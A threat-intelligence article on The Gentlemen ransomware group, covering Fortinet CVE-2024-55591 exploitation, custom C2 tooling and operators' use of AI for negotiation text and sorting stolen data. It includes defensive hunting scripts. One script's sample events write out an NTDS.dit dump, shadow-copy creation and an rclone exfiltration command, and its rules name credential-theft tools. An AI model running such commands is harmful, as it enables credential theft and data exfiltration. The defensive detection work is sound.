The Gentlemen Ransomware Group Uses Fortinet Exploits, AI Tools, and Custom C2 to Scale Attacks
The Gentlemen has become one of the most active ransomware operations of 2026, using Fortinet exploits, stolen credentials, custom command-and-control tooling, and AI-assisted workflows to attack enterprise networks.
The group emerged in 2025 and quickly scaled into a major ransomware-as-a-service operation. Halcyon said more than 200 of its victim claims came between January and March 2026, placing it second only to Qilin by volume during that period.
A major leak of internal communications has now given defenders a rare view into how the group operates. Ransom-ISAC's analysis of the leak covered 3,366 Rocket.Chat messages across 22 chat rooms and 66 confirmed victims, and documented the group's custom tooling, its Fortinet exploitation, and its AI-assisted operations.
A fast-growing ransomware operation
The Gentlemen follows a familiar ransomware model. Affiliates break into networks, steal data, encrypt systems, and pressure victims through a leak site. The group also appears to avoid targets in Russia and other CIS countries, a common pattern among Russian-speaking ransomware crews.
Researchers say the operation grew quickly because it offered affiliates a generous revenue split, a multi-platform locker, and access to shared tooling. The group also appears to have attracted people with previous ransomware experience.
Check Point Research said the leaked data exposed nine accounts and included details about infrastructure, affiliate roles, exploit paths, backend systems, and victim operations. The material also showed discussion of Fortinet, Cisco, NTLM relay issues, OWA, and Microsoft 365 credential logs.
| Area | What researchers reported |
|---|---|
| Group name | The Gentlemen |
| Model | Ransomware-as-a-service |
| Language profile | Russian-speaking operator communications |
| Key access focus | Fortinet edge devices, credentials, VPN access, and public-facing services |
| Custom tooling | G-BOT C2, Linux and Windows beacons, SOCKS5 proxying, and builder features |
| AI use | Negotiation drafting, language support, branding, and stolen-data triage discussions |
Fortinet remains a key entry point
The leaked chats show repeated attention to Fortinet appliances. The most important vulnerability mentioned is CVE-2024-55591, a FortiOS and FortiProxy authentication bypass issue.
The official Fortinet advisory (FG-IR-24-535) says the flaw can allow a remote attacker to gain super-admin privileges through crafted requests to the Node.js WebSocket module or crafted CSF proxy requests. Fortinet also noted reports of exploitation in the wild. The issue affects FortiOS 7.0.0 through 7.0.16 and FortiProxy 7.0.0 through 7.0.19 and 7.2.0 through 7.2.12, and it requires the HTTP/HTTPS administrative interface to be reachable by the attacker, which is why Fortinet's interim workaround was to disable that interface or restrict it with local-in policies. The advisory's indicators include admin logins recorded from "jsconsole" with identical or bogus source and destination addresses, followed by the creation of admin accounts with random names.
Ransom-ISAC described CVE-2024-55591 as the group's primary initial access vector in the reviewed leak. The same report said operators also discussed CVE-2025-32433 (the unauthenticated remote code execution flaw in the Erlang/OTP SSH server), CVE-2025-33073 (a Windows SMB client elevation-of-privilege issue tied to NTLM reflection), Citrix NetScaler issues, and other enterprise-facing weaknesses.
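The jsconsole indicator that Fortinet's advisory describes is straightforward to hunt for in FortiOS event logs. The Python below is an added example written for this article, not code from Ransom-ISAC, Fortinet, or the group's own material: it parses the space-separated key=value format of FortiOS event logs, flags jsconsole logins whose source and destination addresses are identical or drawn from the bogus addresses the advisory lists, and escalates any admin-account creation that follows such a login. The sample log lines are constructed for the example, and the address set and severity levels are assumptions rather than vendor guidance.

```python
import re
from dataclasses import dataclass

# FortiOS event logs are space-separated key=value pairs; values containing spaces are quoted.
KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

# Addresses associated with the forged srcip/dstip pair in exploitation logs. Assumed set for this example.
BOGUS_ADDRS = {"1.1.1.1", "127.0.0.1", "2.2.2.2", "8.8.8.8"}

# Constructed sample lines modeled on the FortiOS event log layout (not real device output).
SAMPLE_LOG = [
    'date=2026-01-12 time=09:14:03 type="event" subtype="system" level="information" vd="root" '
    'logdesc="Admin login successful" user="admin" ui="https(10.20.0.15)" method="https" '
    'srcip=10.20.0.15 dstip=10.20.0.1 action="login" status="success" profile="super_admin" '
    'msg="Administrator admin logged in successfully from https(10.20.0.15)"',
    'date=2026-01-12 time=10:05:00 type="event" subtype="system" level="information" vd="root" '
    'logdesc="Object attribute configured" user="admin" ui="https(10.20.0.15)" action="Add" '
    'cfgpath="system.admin" cfgobj="jdoe-ro" msg="Add system.admin jdoe-ro"',
    'date=2026-01-12 time=23:41:55 type="event" subtype="system" level="information" vd="root" '
    'logdesc="Admin login successful" user="admin" ui="jsconsole" method="jsconsole" '
    'srcip=1.1.1.1 dstip=1.1.1.1 action="login" status="success" profile="super_admin" '
    'msg="Administrator admin logged in successfully from jsconsole"',
    'date=2026-01-12 time=23:42:10 type="event" subtype="system" level="information" vd="root" '
    'logdesc="Object attribute configured" user="admin" ui="jsconsole(127.0.0.1)" action="Add" '
    'cfgpath="system.admin" cfgobj="gk1i2n" msg="Add system.admin gk1i2n"',
]


@dataclass
class Finding:
    severity: str
    reason: str
    record: dict


def parse_fortios_line(line: str) -> dict:
    """Turn one FortiOS log line into a dict of field -> value (quotes stripped)."""
    return {m.group(1): m.group(2) if m.group(2) is not None else m.group(3)
            for m in KV_RE.finditer(line)}


def triage(lines):
    """Flag jsconsole logins and admin-account creation; lines must be in chronological order."""
    findings = []
    jsconsole_login_seen = False
    for line in lines:
        rec = parse_fortios_line(line)
        ui = rec.get("ui", "")
        from_jsconsole = ui.startswith("jsconsole") or rec.get("method") == "jsconsole"
        if rec.get("logdesc") == "Admin login successful" and from_jsconsole:
            src, dst = rec.get("srcip"), rec.get("dstip")
            if src == dst or src in BOGUS_ADDRS:
                findings.append(Finding("high", "jsconsole login with forged source/destination address", rec))
            else:
                # The GUI console also logs as jsconsole, so a plain jsconsole login needs confirmation.
                findings.append(Finding("medium", "jsconsole login; confirm with the administrator", rec))
            jsconsole_login_seen = True
        elif rec.get("cfgpath") == "system.admin" and rec.get("action") == "Add":
            # Account creation by itself is routine; after a jsconsole login it is the advisory's second indicator.
            severity = "high" if (from_jsconsole or jsconsole_login_seen) else "low"
            findings.append(Finding(severity, f"admin account '{rec.get('cfgobj')}' created", rec))
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f.severity.upper(), f.reason, "at", f.record.get("date"), f.record.get("time"))
```

Feed the script the exported event log of each FortiOS or FortiProxy appliance that was exposed before patching; treat any "high" result as a confirmed compromise and rotate every credential stored on the device, not only the admin password.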
Custom G-BOT tooling makes detection harder
The Gentlemen does not rely only on widely known tools. Its leaked materials show a custom command-and-control framework called G-BOT, which gives operators a web-based control panel for managing infected systems.
The Ransom-ISAC report said G-BOT supports beacon management, command execution, Linux and Windows beacons, SOCKS5 proxying, and builder options that can upload payloads to temporary file-sharing services.
This matters because many security teams tune detections around common frameworks such as Cobalt Strike, Sliver, or commercial remote management tools. A custom C2 framework reduces the value of simple signature-based defenses and forces teams to focus on behavior.
| Capability | Defensive significance |
|---|---|
| Per-beacon command execution | Can support hands-on-keyboard activity after initial access |
| SOCKS5 tunneling | Can help operators pivot inside victim networks |
| Linux and Windows beacons | Expands coverage across mixed enterprise environments |
| Temporary file upload support | Can help stage payloads outside traditional attacker infrastructure |
| Custom panel interface | Can bypass detections focused only on known C2 platforms |
AI now supports ransomware operations
The Gentlemen leak also shows how ransomware operators are adding AI tools to their workflow. This does not mean AI runs the attacks by itself. It means operators use AI to make parts of the criminal business faster.
Ransom-ISAC reported references to GPT and Claude for negotiation text. Operators also discussed rented GPU capacity and uncensored models for triaging stolen data at scale.
That pattern matters for incident responders. Ransomware groups can use AI to write more polished victim messages, translate communications, sort stolen files faster, and identify data that increases extortion pressure.
- AI can improve ransom negotiation drafts and victim-facing messages.
- Translation tools can help operators target companies in more countries.
- Local or uncensored models can reduce reliance on monitored commercial AI services.
- GPU rental can support faster review of large stolen datasets.
Old weaknesses still drive new attacks
The group’s tooling has evolved, but the underlying security gaps remain familiar. Vectra AI compared leaks from Conti, Black Basta, LockBit, and The Gentlemen and concluded that ransomware operators changed their staffing, marketing, and tooling while continuing to exploit the same defensive gaps.
The report also highlighted a link between The Gentlemen and earlier ransomware ecosystems. A negotiator using the handle Tinker appeared in both Black Basta and The Gentlemen material, reinforcing the idea that operators often move between brands rather than leaving the ecosystem.
This explains why taking down one ransomware brand rarely ends the threat. Affiliates, negotiators, access brokers, and developers can carry methods, contacts, and infrastructure habits into the next operation.
Credential theft and data exfiltration remain central
After gaining access, The Gentlemen operators focus heavily on credentials. The leaked material references tools used to harvest browser passwords, VPN credentials, wallets, and other saved secrets.
Group-IB said The Gentlemen relies on repeatable tactics such as Fortinet exploitation, brute-forced VPN access, credential abuse, defense evasion, and rapid ransomware deployment. These are not exotic techniques, but they work when organizations leave edge systems exposed or credentials poorly protected.
Defenders should treat credential dumping, access to NTDS.dit (the Active Directory database, usually copied through a Volume Shadow Copy or an ntdsutil IFM export), abnormal Volume Shadow Copy (VSS) snapshot creation or deletion, and unexpected use of file transfer tools as urgent alerts. Waiting for encryption to begin gives attackers too much time to complete data theft and staging.
Indicators defenders should prioritize
Security teams should not rely only on static indicators. The group can change filenames, infrastructure, and tools. However, several patterns from the leaked materials can guide hunting and detection.
| Indicator type | What to monitor | Why it matters |
|---|---|---|
| CVE | CVE-2024-55591 exposure on FortiOS or FortiProxy | Reported as a key Fortinet access path in the leak |
| File pattern | README-GENTLEMEN.txt | Ransom note pattern linked to The Gentlemen locker activity |
| Extension | .i8p14s | Encrypted file extension reported in Linux and NAS locker activity |
| Path | /opt/updateamd | Linux and NAS locker binary path cited in the leak analysis |
| Tooling | rclone, MEGAcmd, WinSCP, Velociraptor, browser credential dumpers | Can indicate staging, exfiltration, remote control, or credential theft |
| Behavior | Mass file rename, unusual VPN login success, suspicious LDAP access | Can reveal intrusion activity before full encryption |
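The file-level indicators in the table can be checked directly on a Linux host or a mounted NAS export. The Python below is an added example for this article, not tooling from any of the cited reports: it walks a filesystem, records ransom notes and the locker binary path, and counts files carrying the reported extension per directory so that a burst of renamed files stands out from a single stray hit. The sample directory tree is constructed in a temporary folder; the per-directory threshold and the excluded pseudo-filesystems are assumptions.

```python
import os
import tempfile
from collections import Counter
from pathlib import Path

# Indicators reported in the leak analysis.
RANSOM_NOTE = "README-GENTLEMEN.txt"
ENCRYPTED_EXT = ".i8p14s"
LOCKER_PATHS = ("opt/updateamd",)          # relative to the scanned root
# Assumed: this many renamed files in one directory counts as mass encryption rather than a stray hit.
MASS_RENAME_THRESHOLD = 5
# Assumed: pseudo-filesystems to skip when the root is "/".
SKIP_DIRS = {"proc", "sys", "dev", "run"}


def hunt(root):
    """Walk a filesystem (or a mounted NAS export) and collect locker indicators."""
    root = Path(root)
    result = {"notes": [], "locker_binaries": [], "encrypted_dirs": {}, "encrypted_total": 0}
    for rel in LOCKER_PATHS:
        candidate = root / rel
        if candidate.exists():
            result["locker_binaries"].append(str(candidate))
    per_dir = Counter()
    for dirpath, dirs, files in os.walk(root):
        if Path(dirpath) == root:
            dirs[:] = [d for d in dirs if d not in SKIP_DIRS]
        for name in files:
            if name == RANSOM_NOTE:
                result["notes"].append(os.path.join(dirpath, name))
            elif name.endswith(ENCRYPTED_EXT):
                per_dir[dirpath] += 1
    result["encrypted_total"] = sum(per_dir.values())
    result["encrypted_dirs"] = {d: n for d, n in per_dir.items() if n >= MASS_RENAME_THRESHOLD}
    return result


def verdict(result):
    """Summarize a hunt result: locker binary or mass encryption is critical, any other hit is high."""
    if result["encrypted_dirs"] or result["locker_binaries"]:
        return "critical"
    if result["notes"] or result["encrypted_total"]:
        return "high"
    return "clean"


def build_sample_tree():
    """Constructed directory tree standing in for a compromised Linux host with a NAS share."""
    base = Path(tempfile.mkdtemp(prefix="gentlemen-hunt-"))
    (base / "opt").mkdir()
    (base / "opt" / "updateamd").write_bytes(b"placeholder, not a real binary")
    share = base / "srv" / "share" / "finance"
    share.mkdir(parents=True)
    for i in range(8):
        (share / f"q{i}-2025.xlsx{ENCRYPTED_EXT}").write_bytes(b"\x00" * 16)
    (share / RANSOM_NOTE).write_text("constructed note text\n")
    home = base / "home" / "alice"
    home.mkdir(parents=True)
    (home / "todo.txt").write_text("untouched file\n")
    (home / f"backup.tar{ENCRYPTED_EXT}").write_bytes(b"\x00" * 16)
    return base


if __name__ == "__main__":
    tree = build_sample_tree()
    found = hunt(tree)
    print(verdict(found), found["encrypted_total"], "encrypted files,", len(found["notes"]), "notes")
```

Run it as root against "/" and against each NAS mount point; because the group can change file names and paths, pair this static sweep with the behavioral monitoring from the table rather than relying on it alone.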
What organizations should do now
The fastest risk reduction starts at the edge. Organizations running Fortinet appliances should verify patch status, review exposed management interfaces, rotate local admin passwords, and inspect VPN accounts for weak or reused credentials.
The Fortinet PSIRT advisory for CVE-2024-55591 should guide patching. Teams should also audit configuration backups: an exported FortiGate configuration carries LDAP bind credentials, admin password hashes, and other secrets, and the stored passwords are only reversibly obscured unless private data encryption is enabled, so a copied or leaked backup should be handled as a credential exposure.
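That audit can be scripted against the backup file itself. The Python below is an added example for this article, not a Fortinet tool: it parses the config/edit/set/next/end nesting of a FortiGate backup and reports three things a responder wants to know after an appliance exposure, namely management protocols allowed on a WAN-role interface, LDAP servers whose bind account and password sit in the export, and admin accounts with no trusted-host restriction. The configuration text is constructed for the example; object names, addresses, and the ENC blobs are placeholders.

```python
import shlex
from dataclasses import dataclass

MGMT_PROTOCOLS = {"https", "http", "ssh", "telnet"}

# Constructed FortiGate configuration excerpt (placeholder names and addresses, not a real export).
SAMPLE_CONFIG = """\
#config-version=constructed-example
config system global
    set admin-sport 443
end
config system interface
    edit "wan1"
        set ip 203.0.113.10 255.255.255.0
        set allowaccess ping https ssh
        set role wan
    next
    edit "internal"
        set ip 10.20.0.1 255.255.255.0
        set allowaccess ping https ssh fgfm
        set role lan
    next
end
config user ldap
    edit "corp-ad"
        set server "10.20.0.5"
        set cnid "sAMAccountName"
        set dn "dc=corp,dc=example"
        set type regular
        set username "CN=svc-fortigate,OU=Service,DC=corp,DC=example"
        set password ENC placeholderblob
    next
end
config system admin
    edit "admin"
        set accprofile "super_admin"
        set trusthost1 0.0.0.0 0.0.0.0
        set password ENC placeholderblob
    next
end
"""


@dataclass(frozen=True)
class Setting:
    path: tuple    # nesting, e.g. ("system interface", "wan1")
    key: str
    values: tuple


def parse_fortigate_config(text):
    """Minimal parser for the config/edit/set/next/end structure of a FortiGate backup."""
    stack, settings = [], []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        tokens = shlex.split(line)
        head = tokens[0]
        if head == "config":
            stack.append(" ".join(tokens[1:]))
        elif head == "edit":
            stack.append(tokens[1])
        elif head in ("next", "end"):
            stack.pop()
        elif head in ("set", "unset", "append"):
            settings.append(Setting(tuple(stack), tokens[1], tuple(tokens[2:])))
    return settings


def audit(settings):
    """Apply the three exposure checks to every two-level object (table, entry name)."""
    objects = {}
    for s in settings:
        objects.setdefault(s.path, {})[s.key] = s.values
    findings = []
    for path, attrs in objects.items():
        if len(path) != 2:
            continue
        table, name = path
        if table == "system interface" and attrs.get("role") == ("wan",):
            exposed = MGMT_PROTOCOLS & set(attrs.get("allowaccess", ()))
            if exposed:
                findings.append(f"interface {name}: management protocols {sorted(exposed)} allowed on a WAN interface")
        elif table == "user ldap" and "password" in attrs:
            bind = attrs.get("username", ("<unknown>",))[0]
            findings.append(f"ldap {name}: bind account {bind} stored in backup; rotate it if the export was copied or leaked")
        elif table == "system admin":
            hosts = [v for k, v in attrs.items() if k.startswith("trusthost")]
            if not hosts or all(v[:2] == ("0.0.0.0", "0.0.0.0") for v in hosts):
                findings.append(f"admin {name}: no trusted-host restriction, login allowed from any source")
    return findings


if __name__ == "__main__":
    for finding in audit(parse_fortigate_config(SAMPLE_CONFIG)):
        print(finding)
```

The parser deliberately ignores everything except nesting and set lines, which is enough to enumerate credential-bearing objects; extend the checks in audit() with RADIUS, TACACS+, SNMP, and VPN pre-shared-key tables for a full credential rotation list.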
Identity monitoring also needs more urgency. The Gentlemen’s workflow shows that attackers can move from edge access to credential collection, lateral movement, data theft, and encryption without needing a novel exploit at every step.
- Patch internet-facing appliances quickly, especially Fortinet, Citrix, Cisco, F5, SonicWall, and Palo Alto systems.
- Disable external management access unless administrators need it through a secured path.
- Rotate VPN, local admin, LDAP bind, and service account credentials after suspected exposure.
- Alert on NTDS.dit access, VSS abuse, unusual backup access, and suspicious domain controller enumeration.
- Hunt for unexpected use of rclone, MEGAcmd, WinSCP, Velociraptor, and credential dumping tools.
- Monitor mass file renames and rapid changes on NAS, Linux, VMware, and Windows systems.
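The alerting items above become more useful when they are correlated rather than fired one at a time, because the leak describes a chain (credential collection, then staging and transfer) rather than isolated tools. The Python below is an added example for this article, not detection content from any vendor cited here: it classifies Windows process-creation records (the fields mirror Sysmon event ID 1 or Security event 4688) with a small, deliberately incomplete ruleset for NTDS.dit and shadow-copy access and for the transfer and remote-control tools named above, then raises a per-host alert to critical when a credential-access event is followed by a transfer tool within an assumed one-hour window. The event records are constructed for the example.

```python
import re
from datetime import datetime, timedelta

# Minimal illustrative rules (assumed, not a complete detection set).
CREDENTIAL_ACCESS = [
    ("ntdsutil-ifm", re.compile(r"ntdsutil.*\b(ifm|ntds)\b", re.I)),
    ("vss-snapshot", re.compile(r"\bvssadmin(\.exe)?\s+create\s+shadow\b", re.I)),
    ("shadowcopy-ntds", re.compile(r"HarddiskVolumeShadowCopy\d+\\.*ntds\.dit", re.I)),
    ("reg-save-hive", re.compile(r"\breg(\.exe)?\s+save\s+hklm\\(sam|security|system)\b", re.I)),
]
EXFIL_OR_REMOTE = [
    ("rclone", re.compile(r"\brclone(\.exe)?\b.*\b(copy|sync|move)\b", re.I)),
    ("megacmd", re.compile(r"\b(megacmd|mega-put|megaput)(\.exe)?\b", re.I)),
    ("winscp", re.compile(r"\bwinscp(\.exe)?\b", re.I)),
    ("velociraptor", re.compile(r"\bvelociraptor(\.exe)?\b", re.I)),
]

# Constructed process-creation records (not from a real incident).
SAMPLE_EVENTS = [
    {"time": "2026-02-02T10:00:00", "host": "WS07", "user": "CORP\\jdoe",
     "cmdline": r'"C:\Program Files (x86)\WinSCP\WinSCP.exe" /command "open sftp://vendor.example"'},
    {"time": "2026-02-03T01:10:00", "host": "DC01", "user": "CORP\\svc-backup",
     "cmdline": r'ntdsutil.exe "ac i ntds" "ifm" "create full C:\Windows\Temp\x" q q'},
    {"time": "2026-02-03T01:12:30", "host": "DC01", "user": "CORP\\svc-backup",
     "cmdline": r'C:\Windows\Temp\rclone.exe copy C:\Windows\Temp\x mega:corp-dump --transfers 8'},
    {"time": "2026-02-03T02:00:00", "host": "FS01", "user": "NT AUTHORITY\\SYSTEM",
     "cmdline": r'vssadmin.exe create shadow /for=C:'},
    {"time": "2026-02-03T02:01:00", "host": "FS01", "user": "CORP\\jdoe",
     "cmdline": r'C:\Windows\explorer.exe'},
]


def classify(cmdline):
    """Return ("cred", tag) or ("exfil", tag) for a matching command line, else None."""
    for tag, rx in CREDENTIAL_ACCESS:
        if rx.search(cmdline):
            return ("cred", tag)
    for tag, rx in EXFIL_OR_REMOTE:
        if rx.search(cmdline):
            return ("exfil", tag)
    return None


def correlate(events, window=timedelta(hours=1)):
    """Group hits per host and escalate when credential access precedes a transfer tool within the window."""
    by_host = {}
    for e in sorted(events, key=lambda e: e["time"]):
        hit = classify(e["cmdline"])
        if hit:
            by_host.setdefault(e["host"], []).append((datetime.fromisoformat(e["time"]), hit, e))
    alerts = {}
    for host, hits in by_host.items():
        creds = [h for h in hits if h[1][0] == "cred"]
        exfil = [h for h in hits if h[1][0] == "exfil"]
        chained = any(timedelta(0) <= x[0] - c[0] <= window for c in creds for x in exfil)
        level = "critical" if chained else "high" if creds else "medium"
        alerts[host] = {
            "level": level,
            "tags": [h[1][1] for h in hits],
            "users": sorted({h[2]["user"] for h in hits}),
        }
    return alerts


if __name__ == "__main__":
    for host, alert in correlate(SAMPLE_EVENTS).items():
        print(host, alert["level"], alert["tags"], alert["users"])
```

A lone WinSCP launch on a workstation stays at medium so that routine administration does not page anyone, while the ntdsutil-then-rclone sequence on the domain controller, which matches the credential theft and staging workflow the reports describe, is the one that should interrupt the on-call responder.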
The larger lesson for defenders
The Gentlemen represents a newer ransomware brand, but its success comes from familiar weaknesses: unpatched edge devices, exposed VPNs, weak credentials, incomplete monitoring, and delayed response to internal movement.
Vectra AI described this pattern clearly across multiple ransomware leaks. Tooling changes, but the gaps that let attackers enter, move, and steal often remain unchanged for years.
The latest research should push organizations to focus less on the ransomware brand name and more on attack behaviors. The group name may change, but Fortinet exploitation, VPN abuse, credential theft, data staging, and remote tool misuse still provide defenders with practical detection points.
Check Point Research also shows how affiliate programs can scale quickly when experienced operators, shared tooling, and profit incentives align. That makes prevention, credential hygiene, and early detection more important than waiting for a specific ransomware payload to appear.
The most useful takeaway is simple. The Gentlemen’s rise does not require defenders to solve an entirely new class of attack. It requires them to close old gaps faster, watch edge devices more closely, and treat credential theft as the start of a ransomware incident, not a minor alert.
As Group-IB’s TTP analysis shows, the group benefits from repeatable intrusion patterns. Organizations that harden remote access, remove exposed services, monitor credential abuse, and respond early can reduce the group’s easiest paths into the network.
FAQ
What is The Gentlemen?
The Gentlemen is a ransomware-as-a-service operation that emerged in 2025 and became one of the most active ransomware groups in 2026. It steals data, encrypts systems, and pressures victims through double extortion.
Why did the group grow so fast?
Researchers say the group scaled quickly, attracted affiliates, used a custom C2 framework, exploited Fortinet systems, and added AI-assisted workflows for negotiations and data review.
Which Fortinet vulnerability does the group use?
The main Fortinet issue discussed in the leaked material is CVE-2024-55591, an authentication bypass vulnerability affecting FortiOS and FortiProxy that can allow remote attackers to gain super-admin privileges.
What is G-BOT?
G-BOT is a custom command-and-control framework linked to The Gentlemen. Researchers say it supports beacon management, command execution, SOCKS5 proxying, and builder features for Linux and Windows beacons.
How does the group use AI?
The leaked chats suggest operators used or discussed AI for negotiation drafting, translation, branding, and triaging stolen data. The reports do not show AI autonomously carrying out intrusions.
What should organizations do?
Organizations should patch exposed edge devices, especially Fortinet systems, rotate credentials, restrict VPN access, monitor for credential dumping, alert on NTDS.dit and VSS activity, and hunt for unusual tools such as rclone, MEGAcmd, WinSCP, and Velociraptor.